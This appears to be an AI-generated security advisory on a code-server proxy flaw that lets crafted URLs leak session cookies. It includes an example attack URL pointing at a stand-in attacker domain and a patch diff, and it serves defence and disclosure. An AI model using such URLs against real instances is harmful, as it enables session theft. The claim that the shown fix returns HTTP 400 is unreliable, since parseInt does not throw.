CVE-2025-47269 Overview
CVE-2025-47269 is an Improper Proxy Request Validation vulnerability in code-server, the popular tool that enables VS Code to run on any machine with browser access. Prior to version 4.99.4, the application fails to properly validate port parameters in proxy requests, allowing attackers to redirect traffic to arbitrary external domains. This vulnerability is classified under CWE-441 (Unintended Proxy or Intermediary).
Critical Impact
Attackers can craft malicious URLs that exfiltrate session tokens, leading to complete system compromise with the privileges of the user running code-server.
Affected Products
- code-server versions prior to 4.99.4
- Deployments with the built-in proxy feature enabled
- Instances accessible via web browser with proxy subpath functionality
Discovery Timeline
- 2025-05-09 - CVE-2025-47269 published to NVD
- 2025-05-12 - Last updated in NVD database
Technical Details for CVE-2025-47269
Vulnerability Analysis
This vulnerability resides in the proxy subpath handling mechanism of code-server. The application's proxy feature is designed to forward requests to local ports, enabling developers to access locally running services through their code-server instance. However, the implementation fails to validate that the port parameter contains only numeric values, allowing attackers to inject arbitrary domain references.
When a user clicks a maliciously crafted URL such as https://<code-server>/proxy/test@evil.com/path, the application incorrectly interprets the path and proxies the request to the attacker-controlled domain test@evil.com/path. Since cookies are included in proxied requests, this allows the attacker to capture the user's session token.
Root Cause
The root cause lies in the path proxy route handler within src/node/routes/pathProxy.ts. The vulnerable code directly concatenates the req.params.port parameter into the proxy URL without proper validation or parsing. The parameter was expected to be a numeric port value but accepted arbitrary strings, enabling URL manipulation attacks.
Attack Vector
The attack exploits the network-accessible proxy functionality through user interaction. An attacker must convince a victim to click a malicious link pointing to their code-server instance. The attack flow is:
- Attacker crafts a URL with their domain embedded in the port parameter
- Victim clicks the malicious link while authenticated to code-server
- code-server proxies the request to the attacker's domain, including session cookies
- Attacker captures the session token and gains full access to the victim's code-server instance
): string => {
// If there is a base path, strip it out.
const base = (req as any).base || ""
- return `http://0.0.0.0:${req.params.port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}`
+ let port: number
+ try {
+ port = parseInt(req.params.port, 10)
+ } catch (err) {
+ throw new HttpError("Invalid port", HttpCode.BadRequest)
+ }
+ return `http://0.0.0.0:${port}${opts?.proxyBasePath || ""}/${req.originalUrl.slice(base.length)}`
}
export async function proxy(
Source: GitHub Commit Update
Detection Methods for CVE-2025-47269
Indicators of Compromise
- Outbound connections from code-server instances to unexpected external domains
- Proxy requests with non-numeric port parameters containing @ symbols or domain names
- Session token usage from IP addresses inconsistent with legitimate user activity
- Unusual access patterns following proxy requests to external domains
Detection Strategies
- Implement web application firewall rules to detect proxy requests with malformed port parameters
- Monitor code-server access logs for /proxy/ paths containing non-numeric characters
- Alert on session authentications from new geographic locations or IP addresses
- Review HTTP referrer headers for suspicious external domain references in proxy requests
Monitoring Recommendations
- Enable verbose logging for the proxy subpath functionality in code-server
- Configure network monitoring to track outbound connections from code-server host systems
- Implement anomaly detection for session token usage patterns
- Set up alerts for authentication events following proxy route access
How to Mitigate CVE-2025-47269
Immediate Actions Required
- Upgrade code-server to version 4.99.4 or later immediately
- Review access logs for any signs of exploitation prior to patching
- Rotate session tokens for all users as a precautionary measure
- Consider temporarily disabling the proxy feature if immediate upgrade is not possible
Patch Information
The vulnerability has been addressed in code-server version 4.99.4. The fix implements proper integer parsing for the port parameter, rejecting any non-numeric values with an HTTP 400 Bad Request error. Organizations should update their code-server installations immediately.
For detailed patch information, refer to the GitHub Security Advisory GHSA-p483-wpfp-42cj and the official release v4.99.4.
Workarounds
- Disable the built-in proxy feature if not required for operations
- Implement network-level restrictions to prevent code-server from making outbound connections to arbitrary domains
- Use a reverse proxy with strict URL validation rules in front of code-server
- Educate users about the risks of clicking untrusted links to code-server instances
# Configuration example
# Update code-server to patched version
npm update code-server@4.99.4
# Or using the standalone installer
curl -fsSL https://code-server.dev/install.sh | sh -s -- --version=4.99.4
# Verify installed version
code-server --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
